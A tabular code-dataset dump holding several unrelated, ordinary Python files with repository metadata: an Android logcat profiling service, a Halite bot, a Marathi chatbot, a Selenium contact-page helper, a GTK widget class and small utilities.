hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a9c79fb37bd32e1b5430e2572ac344f70eb99c0b | 367 | py | Python | alpha_gomoku/cppboard/bitboard/setup.py | YouHuang67/alpha_gomoku | 885690d80f1d34d27bc39cbeee4388b50e3d7a23 | [
"MIT"
] | null | null | null | alpha_gomoku/cppboard/bitboard/setup.py | YouHuang67/alpha_gomoku | 885690d80f1d34d27bc39cbeee4388b50e3d7a23 | [
"MIT"
] | null | null | null | alpha_gomoku/cppboard/bitboard/setup.py | YouHuang67/alpha_gomoku | 885690d80f1d34d27bc39cbeee4388b50e3d7a23 | [
"MIT"
] | null | null | null | from distutils.core import setup, Extension
sources = ['board_wrap.cxx', 'board.cpp',
'board_bits.cpp', 'init.cpp',
'lineshapes.cpp', 'pns.cpp', 'shapes.cpp']
module = Extension(
'_board', sources=sources,
extra_compile_args=['/O2'],
language='c++'
)
setup(name='board',
ext_modules=[module],
py_modules=['board']) | 24.466667 | 53 | 0.607629 | 43 | 367 | 5.023256 | 0.627907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003448 | 0.209809 | 367 | 15 | 54 | 24.466667 | 0.741379 | 0 | 0 | 0 | 0 | 0 | 0.266304 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9c7e7b97223ab3a021b88e0c7b80b98f6271253 | 7,068 | py | Python | manafa/services/hunterService.py | RRua/petra-like | cfb6a978f69792845b029d41a1775f36f4d98119 | [
"MIT"
] | null | null | null | manafa/services/hunterService.py | RRua/petra-like | cfb6a978f69792845b029d41a1775f36f4d98119 | [
"MIT"
] | null | null | null | manafa/services/hunterService.py | RRua/petra-like | cfb6a978f69792845b029d41a1775f36f4d98119 | [
"MIT"
] | null | null | null | import time
from .service import Service
import re
from ..utils.Utils import execute_shell_command
from manafa.utils.Logger import log
class HunterService(Service):
def __init__(self, boot_time=0, output_res_folder="hunter"):
Service.__init__(self, output_res_folder)
self.trace = {}
self.boot_time = boot_time
self.end_time = boot_time
def config(self, **kwargs):
pass
def init(self, boot_time=0, **kwargs):
self.boot_time = boot_time
self.trace = {}
def start(self, run_id=None):
self.clean()
def get_results_filename(self, run_id):
if run_id is None:
run_id = execute_shell_command("date +%s")[1].strip()
return self.results_dir + "/hunter-%s-%s.log" % (run_id, str(self.boot_time))
def stop(self, run_id=None):
filename = self.get_results_filename(run_id)
time.sleep(1)
execute_shell_command("adb logcat -d | grep -io \"[<>].*m=example.*]\" > %s" % filename)
return filename
def clean(self):
execute_shell_command("find %s -type f | xargs rm " % self.results_dir)
execute_shell_command("adb logcat -c") # or adb logcat -b all -c
def parseFile(self, filename, functions, instrument=False):
"""array functions to decide which methods collect instrumentation data
variable instrument to decide if array functions is an array of methods
to collect information or to discard"""
with open(filename, 'r') as filehandle:
lines = filehandle.read().splitlines()
self.parseHistory(lines, functions, instrument)
def parseHistory(self, lines_list, functions, instrument=False):
for i, line in enumerate(lines_list):
if re.match(r"^>", line):
before_components = re.split('^>', line.replace(" ", ""))
components = re.split('[,=\[\]]', before_components[1])
function_name = components[0].replace("$", ".")
add_function = self.verifyFunction(function_name, functions, instrument)
if add_function:
begin_time = components[6]
if function_name not in self.trace:
self.trace[function_name] = {}
self.trace[function_name][0] = {'begin_time': float(begin_time) * (pow(10, -3))}
else:
self.trace[function_name][len(self.trace[function_name])] = {
'begin_time': float(begin_time) * (pow(10, -3))}
elif re.match(r"^<", line):
before_components = re.split('^<', line.replace(" ", ""))
components = re.split('[,=\[\] ]', before_components[1])
function_name = components[0].replace("$", ".")
add_function = self.verifyFunction(function_name, functions, instrument)
if add_function:
end_time = components[6]
self.updateTraceReturn(function_name, end_time)
else:
log("invalid line" + line)
def addConsumption(self, function_name, position, consumption, per_component_consumption, metrics):
self.trace[function_name][position].update(
{
'checked': False,
'consumption': consumption,
'per_component_consumption': per_component_consumption,
'metrics': metrics
}
)
def addConsumptionToTraceFile(self, filename, functions, instrument=False):
split_filename = re.split("/", filename)
new_filename = "/".join(split_filename[0: len(split_filename) - 1])
new_filename += '[edited]' + split_filename[len(split_filename) - 1]
with open(filename, 'r+') as fr, open(new_filename, 'w') as fw:
for line in fr:
checked = False
function_begin = ">"
if re.match(r"^>", line):
before_components = re.split('^>', line)
components = re.split('[,=\[\] ]', before_components[1])
function_name = components[0].replace("$", ".")
elif re.match(r"^<", line):
before_components = re.split('^<', line)
components = re.split('[,=\[\] ]', before_components[1])
function_name = components[0].replace("$", ".")
checked = True
function_begin = "<"
add_function = self.verifyFunction(function_name, functions, instrument)
if add_function:
consumption, time = self.returnConsumptionAndTimeByFunction(function_name, checked)
new_line = function_begin + function_name + " [m=example, " + 'cpu = ' + str(
consumption) + ', t = ' + str(time) + ']\n'
fw.write(new_line)
execute_shell_command("rm %s" % filename)
return new_filename
'''
Returns cpu consumption instead total consumption
'''
def returnConsumptionAndTimeByFunction(self, function_name, checked):
consumption = 0.0
cpu_consumption = 0.0
da_time = 0.0
for i, times in enumerate(self.trace[function_name]):
results = self.trace[function_name][i]
if not results['checked']:
if checked:
consumption = results['consumption']
per_component_consumption = results['per_component_consumption']
cpu_consumption = per_component_consumption['cpu']
da_time = results['end_time'] if 'end_time' in results else self.end_time
self.updateChecked(function_name, i)
return cpu_consumption, da_time
da_time = results['begin_time']
return cpu_consumption, da_time
return cpu_consumption, da_time
def updateChecked(self, function_name, position):
self.trace[function_name][position].update(
{
'checked': True
}
)
def updateTraceReturn(self, function_name, end_time):
i = len(self.trace[function_name]) - 1 if function_name in self.trace else -1
while i >= 0:
times = self.trace[function_name][i]
if 'end_time' not in times:
end = float(end_time) * (pow(10, -3))
times.update({'end_time': end})
if end > self.end_time:
self.end_time = end
break
i -= 1
# Verify if it is to add the function to hunter_trace or get consumption
@staticmethod
def verifyFunction(function_name, functions, add_function=False):
if len(functions) == 0:
return True
res = not add_function
for function in functions:
if function in function_name:
res = not res
break
return res
| 41.822485 | 104 | 0.563243 | 756 | 7,068 | 5.070106 | 0.19709 | 0.090791 | 0.044352 | 0.054787 | 0.342552 | 0.258544 | 0.208453 | 0.186538 | 0.171406 | 0.171406 | 0 | 0.007971 | 0.325552 | 7,068 | 168 | 105 | 42.071429 | 0.796098 | 0.038908 | 0 | 0.224638 | 0 | 0 | 0.0582 | 0.007462 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0.007246 | 0.036232 | 0 | 0.210145 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9c9cb26caef7f3a07130091e0579b96a33abecb | 1,650 | py | Python | Basic_if_then/BH4-test.py | BH4/Halite3-bots | 97eb4dcab6bccbfd1649bbac74ef06f0e22035de | [
"MIT"
] | null | null | null | Basic_if_then/BH4-test.py | BH4/Halite3-bots | 97eb4dcab6bccbfd1649bbac74ef06f0e22035de | [
"MIT"
] | null | null | null | Basic_if_then/BH4-test.py | BH4/Halite3-bots | 97eb4dcab6bccbfd1649bbac74ef06f0e22035de | [
"MIT"
] | null | null | null | import hlt
from hlt import constants
import logging
# Import my stuff
import strategies
import helpers
game = hlt.Game()
# Pre-processing area
ship_status = {}
ship_destination = {}
class parameters():
def __init__(self):
# Ship numbers
self.max_ships = 30
self.min_ships = 2
# dropoff parameters
self.large_distance_from_drop = 10
self.farthest_allowed_dropoff = game.game_map.width/2
self.dropoff_dense_requirement = constants.DROPOFF_COST
self.max_dropoffs = 1
# Halite collection parameters
self.minimum_useful_halite = constants.MAX_HALITE/10
self.sufficient_halite_for_droping = constants.MAX_HALITE
self.density_kernal_side_length = 3
self.search_region = 1
self.number_of_dense_spots_to_check = 10
self.explore_dense_requirement = self.minimum_useful_halite*self.density_kernal_side_length**2
# Turn based parameters
self.turn_to_stop_spending = 300
self.crash_return_fudge = 10 # constants.MAX_TURNS - game.game_map.width/2
params = parameters()
# Start
game.ready("BH4-test")
logging.info("Successfully created bot! Player ID is {}.".format(game.my_id))
# Game Loop
while True:
hd = helpers.halite_density(game.game_map, params)
m = max([max(x) for x in hd])
# m <= constants.MAX_HALITE*params.density_kernal_side_length**2
if m > 0*params.explore_dense_requirement:
strategies.expand(game, ship_status, ship_destination, params)
else:
logging.info("Started vacuum")
strategies.vacuum(game, ship_status, ship_destination, params)
| 26.612903 | 102 | 0.704848 | 218 | 1,650 | 5.055046 | 0.440367 | 0.043557 | 0.038113 | 0.068058 | 0.176951 | 0.123412 | 0 | 0 | 0 | 0 | 0 | 0.017692 | 0.212121 | 1,650 | 61 | 103 | 27.04918 | 0.83 | 0.146061 | 0 | 0 | 0 | 0 | 0.04578 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.142857 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9ca3bbd491dc6f1f8700dab6b863d90e4dcb170 | 2,481 | py | Python | multi_linugual_chatbot/mbot.py | HrushikeshShukla/multilingual_chatbot | 696b403ef4e5482e2f670924b557dd17375fc5a9 | [
"Apache-2.0"
] | null | null | null | multi_linugual_chatbot/mbot.py | HrushikeshShukla/multilingual_chatbot | 696b403ef4e5482e2f670924b557dd17375fc5a9 | [
"Apache-2.0"
] | null | null | null | multi_linugual_chatbot/mbot.py | HrushikeshShukla/multilingual_chatbot | 696b403ef4e5482e2f670924b557dd17375fc5a9 | [
"Apache-2.0"
] | null | null | null | # importing dependencies
import re
import inltk
import nltk
nltk.download('punkt')
import io
import random
import string
import warnings
warnings.filterwarnings('ignore')
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from googlesearch import search
##Setting up marathi stopwords
lang='mr'
f=open("marathi_corpus/stop_marathi.txt",'r')
stop_words=f.readlines()
stm=[]
for i in stop_words:
i.strip()
stm.append(re.sub('\n',"",i))
f.close()
#reading corpus
f=open('marathi_corpus/covid.txt')
raw=f.read()
f.close()
sent_tokens=nltk.sent_tokenize(raw)
word_tokens=nltk.word_tokenize(raw)
#text preprocessing:
remove_punct_dict=dict((ord(punct),None) for punct in string.punctuation)#removing punctuation
def preprocess(text):
return (nltk.word_tokenize(text.translate(remove_punct_dict))) #working on word tokens
##greetings
greeting_inputs=("नमस्कार","हाय")
greeting_res=("नमस्कार","हाय")
def greet_sent(sentence):
for word in sentence.split():
if word in greeting_inputs:
return random.choice(greeting_res)
thank_list=['आभार', 'धन्यवाद', 'बाय', "खूप खूप धन्यवाद"]
def bye(sentence):
for word in sentence.split():
if word in thank_list:
return random.choice(thank_list)
#return from knowledge base
def response(user_response):
bot_response=''
sent_tokens.append(user_response)
tfvec=TfidfVectorizer(tokenizer=preprocess,stop_words=stm)
tfidf=tfvec.fit_transform(sent_tokens)
vals=cosine_similarity(tfidf[-1],tfidf)
idx=vals.argsort()[0][-2]
flat=vals.flatten()
flat.sort()
sent_tokens.pop()
req_tfidf=flat[-2]
if (req_tfidf==0):
bot_response=bot_response+"मला माफ करा. मला कळलं नाही तुम्हाला काय म्हणायचंय ते."
bot_response=bot_response+"\nमला हे इंटरनेटवर मिळाले:"
query=user_response
for url in search(query, lang=lang, num_results=3):
bot_response=bot_response+"\n"+url
return bot_response
else:
bot_response=bot_response+sent_tokens[idx]
return bot_response
#chating system
def chat(user_response):
bot_response=''
if bye(user_response)!=None:
bot_response=bot_response+bye(user_response)
return (bot_response, False)
elif greet_sent(user_response)!=None:
bot_response=bot_response+greet_sent(user_response)
return (bot_response, True)
else:
bot_response=bot_response+response(user_response)
return(bot_response, True)
| 28.517241 | 94 | 0.731963 | 417 | 2,481 | 4.285372 | 0.369305 | 0.129267 | 0.095691 | 0.086178 | 0.20817 | 0.133184 | 0.096251 | 0.053721 | 0.042529 | 0 | 0 | 0.002809 | 0.139057 | 2,481 | 86 | 95 | 28.848837 | 0.816479 | 0.070536 | 0 | 0.166667 | 0 | 0.013889 | 0.08762 | 0.023976 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069444 | false | 0 | 0.152778 | 0.013889 | 0.319444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9cc574d34510a5a7c799bfb6ad7da4119b10d52 | 742 | py | Python | practiceset/hk/fraction_of_plusMinus.py | dipsuji/Phython-Learning | 78689d3436a8573695b869a19457875ac77fcee4 | [
"Apache-2.0"
] | 1 | 2021-12-06T05:09:10.000Z | 2021-12-06T05:09:10.000Z | practiceset/hk/fraction_of_plusMinus.py | dipsuji/Phython-Learning | 78689d3436a8573695b869a19457875ac77fcee4 | [
"Apache-2.0"
] | null | null | null | practiceset/hk/fraction_of_plusMinus.py | dipsuji/Phython-Learning | 78689d3436a8573695b869a19457875ac77fcee4 | [
"Apache-2.0"
] | 1 | 2021-12-06T05:09:16.000Z | 2021-12-06T05:09:16.000Z | def fraction_plusMinus(arr):
count_pos = 0
count_neg = 0
count_0 = 0
arr_len = len(arr)
# print(arr_len)
# print(arr)
for i in range(0, len(arr)):
if arr[i] > 0:
count_pos += 1
elif arr[i] < 0:
count_neg += 1
elif arr[i] == 0:
count_0 += 1
propor_pos = round(count_pos / arr_len, arr_len)
propor_neg = round(count_neg / arr_len, arr_len)
propor_zero = round(count_0 / arr_len, arr_len)
# print(propor_pos, propor_neg, propor_zero, sep=' ', end='\n')
print(propor_pos, end='\n')
print(propor_neg, end='\n')
print(propor_zero, end='\n')
fraction_plusMinus([-2, 3, -4, 0, 5, 1])
fraction_plusMinus([5, 2, -4, 0, 0, 1, -3])
| 24.733333 | 67 | 0.56469 | 119 | 742 | 3.277311 | 0.226891 | 0.123077 | 0.038462 | 0.076923 | 0.169231 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0.048872 | 0.283019 | 742 | 29 | 68 | 25.586207 | 0.684211 | 0.117251 | 0 | 0 | 0 | 0 | 0.009217 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0 | 0 | 0.05 | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9ccbe1dd76a9b926989e24973b853a53bc7aeb8 | 7,731 | py | Python | fixture/contacts.py | annovikov/Python_education | f6d731c81d1cbfdd1085fb9893c1c123e4eae64f | [
"Apache-2.0"
] | null | null | null | fixture/contacts.py | annovikov/Python_education | f6d731c81d1cbfdd1085fb9893c1c123e4eae64f | [
"Apache-2.0"
] | null | null | null | fixture/contacts.py | annovikov/Python_education | f6d731c81d1cbfdd1085fb9893c1c123e4eae64f | [
"Apache-2.0"
] | null | null | null | from model.contact import ContactGroup
import re
class ContactHelper:
def __init__(self, app):
self.app = app
def add_new(self, contactgroup):
wd = self.app.wd
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contactgroup)
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.contact_cash = None
def fill_contact_form(self, contactgroup):
wd = self.app.wd
self.change_fields("firstname", contactgroup.firstname)
self.change_fields("lastname", contactgroup.lastname)
self.change_fields("nickname", contactgroup.nickname)
self.change_fields("company", contactgroup.company)
self.change_fields("address", contactgroup.address)
self.change_fields("home", contactgroup.home)
self.change_fields("work", contactgroup.work)
self.change_fields("mobile", contactgroup.mobile)
self.change_fields("email", contactgroup.email)
self.change_fields("email2", contactgroup.email2)
self.change_fields("address2", contactgroup.address2)
self.change_fields("middlename", contactgroup.middlename)
self.change_fields("notes", contactgroup.notes)
def change_fields(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def modify_by_index(self, index, new_contactgroup):
wd = self.app.wd
self.open_contacts_page()
# self.select_contact_by_index(index)
# search Modify btn with index
wd.find_element_by_xpath(".//*[@id='maintable']/tbody/tr["+str(index+2)+"]/td[8]/a/img").click()
self.fill_contact_form(new_contactgroup)
wd.find_element_by_name("update").click()
self.contact_cash = None
def modify_by_id(self, id, new_contactgroup):
wd = self.app.wd
self.open_contacts_page()
# self.select_contact_by_index(index)
# search Modify btn with index
wd.find_element_by_xpath(".//*[@id='maintable']/tbody/tr["+str(id+2)+"]/td[8]/a/img").click()
self.fill_contact_form(new_contactgroup)
wd.find_element_by_name("update").click()
self.contact_cash = None
def modify_first(self):
self.modify_by_index(0)
def open_contacts_page(self):
wd = self.app.wd
if not (wd.current_url.endswith("/addressbook/") > 0):
wd.find_element_by_link_text("home").click()
def select_add_group_from_list(self, id):
wd = self.app.wd
#wd.find_elements_by_xpath(".//*[@id='content']/form[2]/div[4]/select/option")[index2].click()
wd.find_element_by_xpath(".//*[@id='content']/form[2]/div[4]//option[@value='%s']" % id).click()
wd.find_element_by_name("add").click()
def select_group_for_deletion(self, id):
wd = self.app.wd
wd.find_element_by_xpath(".//*[@id='right']//option[@value='%s']" % id).click()
def delete_contact_from_group(self):
wd = self.app.wd
wd.find_element_by_name("remove").click()
def delete_by_index(self, index):
wd = self.app.wd
self.open_contacts_page()
# select first group
self.select_contact_by_index(index)
# delete
wd.find_element_by_xpath(".//*[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cash = None
def delete_by_id(self, id):
wd = self.app.wd
self.open_contacts_page()
# select first group
self.select_contact_by_id(id)
# delete
wd.find_element_by_xpath(".//*[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cash = None
def delete_first(self):
self.delete_by_index(0)
def select_contact_by_index(self, index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def select_contact_by_id(self, id):
wd = self.app.wd
wd.find_element_by_xpath(".//*[@id='%s']" % id).click()
def select_first(self):
wd = self.app.wd
wd.find_element_by_name("selected[]").click()
def count(self):
wd = self.app.wd
self.open_contacts_page()
return len(wd.find_elements_by_name("selected[]"))
contact_cash = None
def get_contact_list(self):
if self.contact_cash is None:
wd = self.app.wd
self.open_contacts_page()
self.contact_cash = []
for element in wd.find_elements_by_xpath("//tbody/tr[@name='entry']"):
firstname = element.find_element_by_xpath("td[3]").text
lastname = element.find_element_by_xpath("td[2]").text
id = element.find_element_by_name("selected[]").get_attribute("value")
all_phones = element.find_element_by_xpath("td[6]").text
all_emails = element.find_element_by_xpath("td[5]").text
address = element.find_element_by_xpath("td[4]").text
self.contact_cash.append(ContactGroup(firstname=firstname, lastname=lastname, id=id, address=address, all_emails_from_home_page=all_emails, all_phones_from_home_page=all_phones))
return list(self.contact_cash)
def open_contact_to_edit_by_index(self, index):
wd = self.app.wd
self.open_contacts_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[7]
cell.find_element_by_tag_name("a").click()
def open_contact_view_by_index(self, index):
wd = self.app.wd
self.open_contacts_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[6]
cell.find_element_by_tag_name("a").click()
def get_contact_info_from_edit_page(self, index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname = wd.find_element_by_name("firstname").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
id = wd.find_element_by_name("id").get_attribute("value")
address = wd.find_element_by_name("address").text
homephone = wd.find_element_by_name("home").get_attribute("value")
workphone = wd.find_element_by_name("work").get_attribute("value")
mobilephone = wd.find_element_by_name("mobile").get_attribute("value")
secondaryphone = wd.find_element_by_name("phone2").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
return ContactGroup(firstname=firstname, lastname=lastname, id=id, address=address, homephone=homephone, mobilephone=mobilephone, workphone=workphone,
secondaryphone=secondaryphone, email=email, email2=email2, email3=email3)
def get_contact_from_view_page(self, index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text = wd.find_element_by_id("content").text
homephone = re.search("H: (.*)", text).group(1)
workphone = re.search("W: (.*)", text).group(1)
mobilephone = re.search("M: (.*)", text).group(1)
secondaryphone = re.search("P: (.*)", text).group(1)
return ContactGroup(homephone=homephone, mobilephone=mobilephone, workphone=workphone, secondaryphone=secondaryphone)
| 42.245902 | 194 | 0.653214 | 1,032 | 7,731 | 4.594961 | 0.125 | 0.088148 | 0.104175 | 0.094897 | 0.579291 | 0.491354 | 0.417756 | 0.400042 | 0.32771 | 0.279418 | 0 | 0.006882 | 0.210581 | 7,731 | 182 | 195 | 42.478022 | 0.770113 | 0.035442 | 0 | 0.314685 | 0 | 0 | 0.094145 | 0.039619 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160839 | false | 0 | 0.013986 | 0 | 0.216783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9cde816018d4cde80fd4caa4025019fd37e3e92 | 2,377 | py | Python | src/ramstk/views/gtk3/widgets/widget.py | TahaEntezari/ramstk | f82e5b31ef5c4e33cc02252263247b99a9abe129 | [
"BSD-3-Clause"
] | 26 | 2019-05-15T02:03:47.000Z | 2022-02-21T07:28:11.000Z | src/ramstk/views/gtk3/widgets/widget.py | TahaEntezari/ramstk | f82e5b31ef5c4e33cc02252263247b99a9abe129 | [
"BSD-3-Clause"
] | 815 | 2019-05-10T12:31:52.000Z | 2022-03-31T12:56:26.000Z | src/ramstk/views/gtk3/widgets/widget.py | TahaEntezari/ramstk | f82e5b31ef5c4e33cc02252263247b99a9abe129 | [
"BSD-3-Clause"
] | 9 | 2019-04-20T23:06:29.000Z | 2022-01-24T21:21:04.000Z | # pylint: disable=non-parent-init-called
# -*- coding: utf-8 -*-
#
# ramstk.views.gtk3.widgets.widget.py is part of the RAMSTK Project
#
# All rights reserved.
# Copyright 2007 - 2020 Doyle Rowland doyle.rowland <AT> reliaqual <DOT> com
"""RAMSTK GTK3 Base Widget Module."""
# Standard Library Imports
from typing import Any, Dict
# RAMSTK Package Imports
from ramstk.views.gtk3 import GObject, _
class RAMSTKWidget:
"""The RAMSTK Base Widget class."""
# Define private scalar class attributes.
_default_height = -1
_default_width = -1
def __init__(self) -> None:
"""Create RAMSTK Base widgets."""
GObject.GObject.__init__(self)
# Initialize private dictionary attributes.
# Initialize private list attributes.
# Initialize private scalar attributes.
# Initialize public dictionary attributes.
self.dic_handler_id: Dict[str, int] = {"": 0}
# Initialize public list attributes.
# Initialize public scalar attributes.
self.height: int = -1
self.width: int = -1
def do_set_properties(self, **kwargs: Any) -> None:
"""Set the properties of the RAMSTK combobox.
:param **kwargs: See below
:Keyword Arguments:
* *height* (int) -- height of the RAMSTKWidget().
* *tooltip* (str) -- the tooltip, if any, for the combobox.
Default is a message to file a QA-type issue to have one added.
* *width* (int) -- width of the RAMSTKWidget().
:return: None
:rtype: None
"""
_can_focus = kwargs.get("can_focus", True)
_height = kwargs.get("height", self._default_height)
_tooltip = kwargs.get(
"tooltip",
_("Missing tooltip, please file a quality type issue to have one added."),
)
_width = kwargs.get("width", self._default_width)
if _height == 0:
_height = self._default_height
if _width == 0:
_width = self._default_width
self.height = _height
self.width = _width
self.set_property("can-focus", _can_focus) # type: ignore
self.set_property("height-request", _height) # type: ignore
self.set_property("tooltip-markup", _tooltip) # type: ignore
self.set_property("width-request", _width) # type: ignore
